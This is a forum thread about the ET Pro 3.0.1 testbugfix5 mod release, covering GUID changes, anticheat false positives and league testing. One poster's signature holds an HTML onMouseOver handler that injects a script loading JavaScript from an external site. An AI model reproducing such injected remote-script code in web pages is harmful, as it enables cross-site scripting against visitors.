ET Pro 3.0.1 testbugfix5 released

Official ET Pro announcements here...

Moderators: Forum moderators, developers

Benbo

Post by Benbo »

Fix some duplicate guids (guids will likely change for many players because of this fix)
when you say change, are we talking one off, or, going back to the old non-fixed GUID
xpsave.net - proud sponsors of eeF & sSs - 82.136.22.171:27960
Rain

Post by Rain »

We changed the data that gets hashed a bit, so the guids are still fixed, but the guids themselves will likely change (drastically, as is the nature of the beast) for several players.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
laeraun

Post by laeraun »

Bani/ETPro team:

Just a note, next time there is a change like the b_anticheat system, and you identify false positives like has happened, could you please release a new version with just the false positives fixed (ie, a 3.0.1a) so that leagues can use this version while the other bugfix cycles go on but so that people arn't falsley being labeled as cheaters while that cycle goes on.

I think this would have saved a lot of heartache for both leagues and players.

Thanks,

laeraun
bani
Site Admin

Post by bani »

the problem is that changes to the anticheat system require new client downloads.

and any changes to the system require testing!

so really, what you are asking as a "3.0.1a" is really called "testbugfix".
ReyalP

Post by ReyalP »

bani wrote:
so really, what you are asking as a "3.0.1a" is really called "testbugfix".
The difference being that leagues and pub admins are far more likely to adopt 3.0.1a (or 3.0.2) than 3.0.1-testbugfix5, even if they are the same thing.

False positive cheats are a pretty big deal, and can cause a lot of headache for honest players and admins.
send lawyers, guns and money
bani
Site Admin

Post by bani »

if enough people would actually test the bugfixes and report the results, there would actually be a 3.0.1(a) / 3.0.2 ...
Benbo

Post by Benbo »

Yeah, but 90% of peeps getting the mod get it off a server so dont even bother looking here, then most of the rest just hit the download page where there is no info at all about testbugfixes.
Really either bringing back a tester group or making it waaay more obvious to average users that they can get the testbugfix and post back problems is the way to go.
Also maybe some kind of ingame ID for each client version, because i bet 90% of users dont have any idea which release they actually use
xpsave.net - proud sponsors of eeF & sSs - 82.136.22.171:27960
defragga

Post by defragga »

bani wrote:if enough people would actually test the bugfixes and report the results, there would actually be a 3.0.1(a) / 3.0.2 ...
We've played with it, the last 5 or 6 clanwars ... and there where no "bugs" ...
Even my old lagproblem was solved ... and the game runs fairly smooth now imo :)
I'd be the first who would say:" Hey bug bug" ... but wtf ... I couldnt find a single bug, during praccys or something ... and the others couldnt find anything too ;)
BOTA

Post by BOTA »

My policy is simple for me.
I do not use bugfixes for wars.
I use the last official release.
ETPro 3.0.1
If you run a league do not go bleeding edge!
I do however update the aniticheat database Bani posts now and then.
Especialy with PB lagging behind.

I do use the bugfixes for private games and unimportant firnedlies or trainings, so I can see if there are any bugs.
daytroxative

Post by daytroxative »

no bugs as of yet, i have been testing since my previous post.... i was 2nd to post i was gonna run it.... so i have been.....

ummm one of my clan members did notice something tho.... about private messaging.... he was complaining about not being able to pm himself... apperantly he used it for some configs he makes.....
IdNotFound

Post by IdNotFound »

Apparently, once a bugfix version has no major bugs, it should become final so people test it in a larger scale.

Myself, I'd love to try/test/play more on those, but I have only found one server so far... It's Efterlyst and I have a sweet ping of 300ms. My clan currently has no server, so I can't test it on scrims. Hope to handle that soon and help out with some reports (as long as the other clans agree to play on it).

I believe the problem is more about server admins updating it... Specially in pubs, which generally have much more players/games a day than clan servers :(
Image nZ/IdNotFound
NaZGûL TeaM Leader
SAWL Tech Staff
newbroker

Maybe and bugfix 5 version error

Post by newbroker »

Hey Bani and all others,

i still don't know exactly if it's an bugfix5 version error because i do the following changes same time:

1) UpDate our ETPro version from 3.0.1 to BugFix5
2) Change our own campaign file and add some new custom maps.

After i do this two changes, each time the custom map: raiders (end of a campaign) loads, the server change to STOPWATCH mode. (Sure without player votes, because isn't possible for players to vote for gametype changes).

Do you have an idea how it could happend change to STOPWATCH mode within a running campaign ?

Thanx for help

Bye NewBroker (one of CompKal Admins)
=CFC= it's all about teamplay
Insano

Post by Insano »

IdNotFound wrote:My clan currently has no server, so I can't test it on scrims.
lies! :D

Well, my team played two scrims in tbf5, didnt notice any bug. I guess it's ready to release, let's go bani, release this new etpro and put all your efforts in ettv :)
DarkSpiritz Clan .:. Co-leader - www.darkspiritz.org
Confederação Brasileira de Wolfenstein - Admin - www.cbwet.org
IdNotFound

Post by IdNotFound »

Insano wrote:
IdNotFound wrote:My clan currently has no server, so I can't test it on scrims.
lies! :D

Well, my team played two scrims in tbf5, didnt notice any bug. I guess it's ready to release, let's go bani, release this new etpro and put all your efforts in ettv :)
That can't be considered a server where you can test things out. You guys have/had a server there and KNOW it ;)

I'm working on a better server already.. :roll:
Image nZ/IdNotFound
NaZGûL TeaM Leader
SAWL Tech Staff
Sphere

Post by Sphere »

Over a fortnight since release and a week since the last post - plus multiple matches being played using the testfix already (much to my annoyance)....

Are the developers happy to release this as 3.0.2 yet ?

(P.S. A max riflenades would be much appreciated - I'm aware of the debate going on elsewhere, but limiting them on a public server helps the gameplay and would be at the server admin's discretion anyway)